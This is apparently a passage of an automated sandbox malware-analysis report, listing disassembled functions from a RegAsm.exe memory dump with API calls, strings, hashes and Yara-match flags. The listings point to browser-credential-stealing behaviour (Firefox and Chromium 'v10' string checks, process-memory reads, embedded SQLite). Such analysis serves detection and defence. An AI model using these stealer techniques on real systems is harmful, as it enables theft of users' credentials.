                                                    • Instruction Fuzzy Hash: 49312B70A0022AEFDF10DFB5EA4529DBAF1BB19314F94502BE800A6250DBBD4891CF29
                                                    APIs
                                                    • __getptd.LIBCMT ref: 004238AD
                                                      • Part of subcall function 00422B51: __getptd_noexit.LIBCMT ref: 00422B54
                                                      • Part of subcall function 00422B51: __amsg_exit.LIBCMT ref: 00422B61
                                                    • __amsg_exit.LIBCMT ref: 004238CD
                                                    • __lock.LIBCMT ref: 004238DD
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004238FA
                                                    • _free.LIBCMT ref: 0042390D
                                                    • InterlockedIncrement.KERNEL32(0042FF98), ref: 00423925
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 3470314060-0
                                                    • Opcode ID: 98aee3a4fd668f7eb30a9f5dc01cac07bd0b85ac9604045b71904aaf4fc5ac2d
                                                    • Instruction ID: 379d8b7d8491d82ad8bb22b4f2bebe489373273112c0eac8251e4c88c96dee02
                                                    • Opcode Fuzzy Hash: 98aee3a4fd668f7eb30a9f5dc01cac07bd0b85ac9604045b71904aaf4fc5ac2d
                                                    • Instruction Fuzzy Hash: F3017031B01A31ABCA21AF65B84575A77B0BF01715F95011BFC00A7290C77CAA528BDD
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FC57
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FCDD
                                                    • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040FDFD
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID: Stable\$firefox
                                                    • API String ID: 3722407311-3160656979
                                                    • Opcode ID: d8166f3787a0d41d1976c45dfa442f1c8a7be0b698ffb262b6a28a4aa4ece215
                                                    • Instruction ID: cbf8309fb132c234f00a8002d50fd01903081def217ec3781965348f70106fa4
                                                    • Opcode Fuzzy Hash: d8166f3787a0d41d1976c45dfa442f1c8a7be0b698ffb262b6a28a4aa4ece215
                                                    • Instruction Fuzzy Hash: 63513072A001099BCF24FB65DD86FED77B9BB54304F10402AE506FB1A1EE35DA48CB95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
                                                    • API String ID: 0-593389478
                                                    • Opcode ID: 44ddc1655922693bcc97fccba41c0656d16dcf0d2dec7783c8136f5dd37007b0
                                                    • Instruction ID: 799a5329e2dddb1e7bb1c4fcc6eae788fafdce760f92e30bff3d43d78a3ad086
                                                    • Opcode Fuzzy Hash: 44ddc1655922693bcc97fccba41c0656d16dcf0d2dec7783c8136f5dd37007b0
                                                    • Instruction Fuzzy Hash: 7E4103B1A007129FD714CE24EA80B5AF3E4EF84710F34856DE94B4B251E776F845EB91
                                                    Strings
                                                    • unable to delete/modify collation sequence due to active statements, xrefs: 1FA6F533
                                                    • %s at line %d of [%.10s], xrefs: 1FA6F4BF
                                                    • misuse, xrefs: 1FA6F4BA
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA6F4B0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
                                                    • API String ID: 0-3348720253
                                                    • Opcode ID: 1419e8db2ce35aac359d12f13fcf7a2fdaa12c6f49a8486b1c2e64f577383571
                                                    • Instruction ID: e31ee437c2e45f79411ece9471b58f988dd0ed0344137b7f3eccb32c913b0b24
                                                    • Opcode Fuzzy Hash: 1419e8db2ce35aac359d12f13fcf7a2fdaa12c6f49a8486b1c2e64f577383571
                                                    • Instruction Fuzzy Hash: BF41F9726043415BD700CF28EC80BAAB7E8EF81325F54456EF5599B282F33EF5168B61
                                                    APIs
                                                    • strlen.MSVCRT ref: 00410F80
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00410FA5
                                                      • Part of subcall function 00410C9B: strlen.MSVCRT ref: 00410CA9
                                                      • Part of subcall function 00410C9B: strlen.MSVCRT ref: 00410CC2
                                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,?,?,004111C0,00000000), ref: 00410FDE
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 004110EB
                                                      • Part of subcall function 00410E69: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00410E7D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strlen$MemoryProcessQueryReadVirtual
                                                    • String ID: @
                                                    • API String ID: 2950663791-2766056989
                                                    • Opcode ID: c2cc1cfa85314c45910bc034ee98174cc7f0756178f724f4dc5a8228099645e7
                                                    • Instruction ID: 3b6d9c815a3ae0ce0ca4a092594ba94f9759023be61228e6920018aca85ab516
                                                    • Opcode Fuzzy Hash: c2cc1cfa85314c45910bc034ee98174cc7f0756178f724f4dc5a8228099645e7
                                                    • Instruction Fuzzy Hash: 9151F672D0014EEFDF04CF95D982AEEBBB1FF08304F10841AFA14A6260D779AA91DB55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: d36215663fb8b7fe1e89f3c7c5fcdde218b15a0ed14c529a25583408f63a1930
                                                    • Instruction ID: e7809d9687f51f614f3a01b5415153dd7ce26315d4a0e86c7e04f02c13b77906
                                                    • Opcode Fuzzy Hash: d36215663fb8b7fe1e89f3c7c5fcdde218b15a0ed14c529a25583408f63a1930
                                                    • Instruction Fuzzy Hash: 8A31267A650B904AC314DF28C890AF3BBF29F89711B54849CE9D74B746E72AE842D760
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004104F4
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 004247F5
                                                      • Part of subcall function 004247E0: __CxxThrowException@8.LIBCMT ref: 0042480A
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 0042481B
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0041052F
                                                    • memcpy.MSVCRT ref: 004105AD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                    • String ID: invalid string position$string too long
                                                    • API String ID: 214693668-4289949731
                                                    • Opcode ID: e5b232cd123efaeaa95fb36e2afcc041d99b40ae121c1f4424e2e942fef76a13
                                                    • Instruction ID: e16fd1244e6cb9c7732594b1692051b148c348e24bcd1216b80b99f717e1379c
                                                    • Opcode Fuzzy Hash: e5b232cd123efaeaa95fb36e2afcc041d99b40ae121c1f4424e2e942fef76a13
                                                    • Instruction Fuzzy Hash: 7F418F74E0024AEFDB04CF98D5819AEBBB1FF09340F504496E915AB351D774EA90DFA8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: 41fd5820155ea8e07efa5aa53526e88de1a4cfede4e237385c6c7eb1f6f5adbc
                                                    • Instruction ID: fd54f250e4b0da3ef98a36eb4747c8e06c1e264dc4a14aafc0cc05ea73ef576a
                                                    • Opcode Fuzzy Hash: 41fd5820155ea8e07efa5aa53526e88de1a4cfede4e237385c6c7eb1f6f5adbc
                                                    • Instruction Fuzzy Hash: 2B31F5762146416BC3019B29DD80BE5BBE0FF55321F084266F858CBA82E32DE960E7B0
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA31D4B
                                                    • misuse, xrefs: 1FA31D46
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA31D3C
                                                    • unknown database: %s, xrefs: 1FA31CBD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
                                                    • API String ID: 0-142545749
                                                    • Opcode ID: cfa23fe99fabaf2b7bddc8b45284ec7beb996cbed2e592f3697ae5041651af50
                                                    • Instruction ID: 7eef05912cf4f3351103a890cf00c729ffadc74adc45f4a4217977bc9d3253a9
                                                    • Opcode Fuzzy Hash: cfa23fe99fabaf2b7bddc8b45284ec7beb996cbed2e592f3697ae5041651af50
                                                    • Instruction Fuzzy Hash: CC2121B5E007416BD7209B29AC40FDB7AB99FC276AF20092CF85856281E73DB515C772
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: 3cd358e1ca42ba51d25a54138da37758c9e1198481ad8a6ab28b2e7f0f41f66c
                                                    • Instruction ID: 3f096c9d817bd2d985e17258236629ee4143896972d9d553bd53733d01df6fef
                                                    • Opcode Fuzzy Hash: 3cd358e1ca42ba51d25a54138da37758c9e1198481ad8a6ab28b2e7f0f41f66c
                                                    • Instruction Fuzzy Hash: 6D21C1B7A503216BC700DE18DC41AEB7BE0EB94661F524426FD4897201E22DE65997E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: 9f3ef0bbe607b4a7bbce938403eb38d09df0d8cd2159e7023eeb3c71293fe561
                                                    • Instruction ID: 0c420c2edcd7442bec5177bc0900443911c702f2a1ff881e0d9565c27a538d8d
                                                    • Opcode Fuzzy Hash: 9f3ef0bbe607b4a7bbce938403eb38d09df0d8cd2159e7023eeb3c71293fe561
                                                    • Instruction Fuzzy Hash: D9216B26594B905AC321DF289D80AE3BFF2AF19310B55489CE9D787796F23EF481C750
                                                    Strings
                                                    • CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 1FA433D6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
                                                    • API String ID: 0-1935849370
                                                    • Opcode ID: 150ca17be2a29a5efca67e938e419d4d43e79b145aaca566c1c578603ec5a9d6
                                                    • Instruction ID: 4a1d1c2f57540eccf7b98ac80db239fcd97eb07a3a2989fa799f679c7d7004c8
                                                    • Opcode Fuzzy Hash: 150ca17be2a29a5efca67e938e419d4d43e79b145aaca566c1c578603ec5a9d6
                                                    • Instruction Fuzzy Hash: 0201C0397003164AD301DF19E800BCAB3E9AFC5311F598166F6008B240EBBCA5878BA1
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B9D937CE,?,?,00000000,1FC2D1CB,000000FF,?,1FBD5B30,?,?,1FBD5ADF,?), ref: 1FBD5BF6
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1FBD5C08
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,1FC2D1CB,000000FF,?,1FBD5B30,?,?,1FBD5ADF,?), ref: 1FBD5C2A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: b8fa66583753779edff245f13eb0a6770a8b2b2dcb95715aa52b1b4579f416e2
                                                    • Instruction ID: 7a9037e6b6e4763c0beaea79b6b27843cfb9cd503c5395325c83cdc156e755d0
                                                    • Opcode Fuzzy Hash: b8fa66583753779edff245f13eb0a6770a8b2b2dcb95715aa52b1b4579f416e2
                                                    • Instruction Fuzzy Hash: BE01673291862AEFDB018F55CD44BEEB7B8FF44B75F000965F912A2680DB799510DA90
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 42cf1a4675cf128a422e1476e4354bff11dd01de658a3acbdbee9ab401a984b7
                                                    • Instruction ID: 8ea2d149d0737e8948a14406486ce3256fafcec75d356dd073eabbf61453cb7e
                                                    • Opcode Fuzzy Hash: 42cf1a4675cf128a422e1476e4354bff11dd01de658a3acbdbee9ab401a984b7
                                                    • Instruction Fuzzy Hash: 72A18570904622DBDB109F26D988A9B3765BF00BB9B080555EB0593340E73FF578EBA2
                                                    APIs
                                                    • memset.MSVCRT ref: 00416F90
                                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?), ref: 00416FAE
                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,000000FF), ref: 00416FD0
                                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00416FFE
                                                    • lstrcatA.KERNEL32(?), ref: 00417011
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$OpenQueryValuememset
                                                    • String ID:
                                                    • API String ID: 558315959-0
                                                    • Opcode ID: 2b23cf20a6915feefb30169c982cba133cbc5f6bbf25386db7298262db862196
                                                    • Instruction ID: 1de54068e5bc169fdd6954bc23f083257234ce87a1e24d317438506600201b0e
                                                    • Opcode Fuzzy Hash: 2b23cf20a6915feefb30169c982cba133cbc5f6bbf25386db7298262db862196
                                                    • Instruction Fuzzy Hash: 65414D7290010CABDF11EFA0DC47FDD7B7DAB09308F4014AABA14E60A1E674A7D88B95
                                                    APIs
                                                    • memcmp.MSVCRT ref: 004080AD
                                                    • memset.MSVCRT ref: 004080DF
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0040812D
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                    • String ID: @$v10
                                                    • API String ID: 1400469952-24753345
                                                    • Opcode ID: 5c11e2cf27205c83e23cddbccf56b770aa3bdc7adb662c8a209098fc9e140871
                                                    • Instruction ID: cf5e1fffe8cf90e5f03da158ad632e0568caa3101dc4bf3db6ca4aeb35450b29
                                                    • Opcode Fuzzy Hash: 5c11e2cf27205c83e23cddbccf56b770aa3bdc7adb662c8a209098fc9e140871
                                                    • Instruction Fuzzy Hash: 09410570A1021CEFDF04DFA4D845BED7BB5AF10308F44402AF915AA2A1DB79AA95CB58
                                                    APIs
                                                    • StrStrA.SHLWAPI(?,?,?,?,00414C10,?,00000000), ref: 004133AC
                                                    • lstrcpyn.KERNEL32(00640E18,?,?), ref: 004133CF
                                                    • lstrlenA.KERNEL32(?), ref: 004133E5
                                                    • wsprintfA.USER32 ref: 00413403
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpynlstrlenwsprintf
                                                    • String ID: %s%s
                                                    • API String ID: 1206339513-3252725368
                                                    • Opcode ID: 3b9d8486c6eaff2a35a03c37f78c6977d3381446056c5f2941719636820ff3ad
                                                    • Instruction ID: 12116c1aee8d4de8b7dc534b27fca2d5501c673fe986d8d967588ee95cbb9010
                                                    • Opcode Fuzzy Hash: 3b9d8486c6eaff2a35a03c37f78c6977d3381446056c5f2941719636820ff3ad
                                                    • Instruction Fuzzy Hash: 1601E436500118FFDF00DFA8CE49A9D7FB6EF06345F148450F9059A211C771EBA19B94
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00423611
                                                      • Part of subcall function 00422B51: __getptd_noexit.LIBCMT ref: 00422B54
                                                      • Part of subcall function 00422B51: __amsg_exit.LIBCMT ref: 00422B61
                                                    • __getptd.LIBCMT ref: 00423628
                                                    • __amsg_exit.LIBCMT ref: 00423636
                                                    • __lock.LIBCMT ref: 00423646
                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0042365A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                    • String ID:
                                                    • API String ID: 938513278-0
                                                    • Opcode ID: 49346eb62c446a655feb5a0eac440022eec0b4581d1d25fa82309c5cdfa4abfe
                                                    • Instruction ID: bbbb7f88eece9b8eff46103b0d9cec543337986492c1c7e584355760c7d6d492
                                                    • Opcode Fuzzy Hash: 49346eb62c446a655feb5a0eac440022eec0b4581d1d25fa82309c5cdfa4abfe
                                                    • Instruction Fuzzy Hash: F5F04F31B40230AAD631BF65B80774A76A4AB10B19FD1015FE8145B6A2CB7C5A419A5E
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: b02db4692aa35bd8b468f3e03022c02afafbc5dbc8388bcb26ba092ba05011e8
                                                    • Instruction ID: d1551ad88b94cc18e380d1906aab654feac824b564e6de5521e5d7017a5f30b9
                                                    • Opcode Fuzzy Hash: b02db4692aa35bd8b468f3e03022c02afafbc5dbc8388bcb26ba092ba05011e8
                                                    • Instruction Fuzzy Hash: BDE096356E120EDFDB006BE0AC2EBE83625AB17706F155025B31E9C0F1CAB481C4AF31
                                                    Strings
                                                    • fts5: syntax error near "%.*s", xrefs: 1FB4751C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fts5: syntax error near "%.*s"
                                                    • API String ID: 0-498961494
                                                    • Opcode ID: f79cee356bd8c8465272f183d71a7bfe7f95abe7d4b02f928cf6063ca3d85323
                                                    • Instruction ID: 6001a467074b1e48046513d9530cb4582f93716c9cc86954c95a39cc9ef1d9bc
                                                    • Opcode Fuzzy Hash: f79cee356bd8c8465272f183d71a7bfe7f95abe7d4b02f928cf6063ca3d85323
                                                    • Instruction Fuzzy Hash: ACB1EFB04083528FD710CF24EA80B9ABBE4EF44358F64495DF9868B340E375F545EB96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: integer overflow
                                                    • API String ID: 0-1678498654
                                                    • Opcode ID: 42a79bbc8a4e89401ae6e71fb53b6cddf5a40045d1ac633f9b501676c9f0b1c0
                                                    • Instruction ID: 931262d20e0348102c43efc6b07043a0945b3eb2d75cc4187b09e5000403b163
                                                    • Opcode Fuzzy Hash: 42a79bbc8a4e89401ae6e71fb53b6cddf5a40045d1ac633f9b501676c9f0b1c0
                                                    • Instruction Fuzzy Hash: 9B115639C047116EDB05AF24FD00B8A37E85F06321F050389E4981A1AAF73CE1C6C3C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: winShmMap1$winShmMap2$winShmMap3
                                                    • API String ID: 0-3826999013
                                                    • Opcode ID: 654d65202e19e15e166699e2144823e4be9424cb92cdfd4d023e8bfae6f7848b
                                                    • Instruction ID: 6a96e6a4382abb2606bed2b3fe6ee783cb4b40f2c980adf7e9332a90e2e5da3b
                                                    • Opcode Fuzzy Hash: 654d65202e19e15e166699e2144823e4be9424cb92cdfd4d023e8bfae6f7848b
                                                    • Instruction Fuzzy Hash: 2561DC719087029FDB10CF25CC81A67BBE5BF84752F0049ADE98297251EB3DF815CB62
                                                    APIs
                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 1FBD0FE7
                                                    • CatchIt.LIBVCRUNTIME ref: 1FBD10CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: CatchEncodePointer
                                                    • String ID: MOC$RCC
                                                    • API String ID: 1435073870-2084237596
                                                    • Opcode ID: 8220ebe14669c1572dd1f276e037f7b5989f06937cfa4e361f283631d9298288
                                                    • Instruction ID: b3c6ec981fbbc208cb96c9e2f7ba97ea049199c968d291a225ff0aaf15b238f8
                                                    • Opcode Fuzzy Hash: 8220ebe14669c1572dd1f276e037f7b5989f06937cfa4e361f283631d9298288
                                                    • Instruction Fuzzy Hash: 16414A75A00349EFEF06DF94D980AEE7BB5FF48308F148099FA04A7221E339A950DB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: temp$wrong number of vtable arguments
                                                    • API String ID: 0-2849069181
                                                    • Opcode ID: e8ca9b2a38d53959cc7794656dbeecfd173e863d24c511612eece75eeb49af9b
                                                    • Instruction ID: ac5c3ecbbd75e4724088b5b1858fd843208ae236f29b0ca53aa751ded6797083
                                                    • Opcode Fuzzy Hash: e8ca9b2a38d53959cc7794656dbeecfd173e863d24c511612eece75eeb49af9b
                                                    • Instruction Fuzzy Hash: D951B1B59043458FC714CF28D44099ABBF5BF89304F404A6DE8865B705D73EFA4ACBA6
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA635F9
                                                    • misuse, xrefs: 1FA635F4
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA635EA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-3564305576
                                                    • Opcode ID: 44b35c34f9f3959501a560f3c90c2ffe89b03125d312ac5fb74f574831aff871
                                                    • Instruction ID: 19f24de9db6fba9540e823cddcb68f532b15af5850072c82bdb1f35e24ae9ee1
                                                    • Opcode Fuzzy Hash: 44b35c34f9f3959501a560f3c90c2ffe89b03125d312ac5fb74f574831aff871
                                                    • Instruction Fuzzy Hash: E151D0F5A04311AFDB14CF24C884A56BBA5BF44734F058268E9599B392E33DF811CB92
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FAD97EF
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FAD97E0
                                                    • database corruption, xrefs: 1FAD97EA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
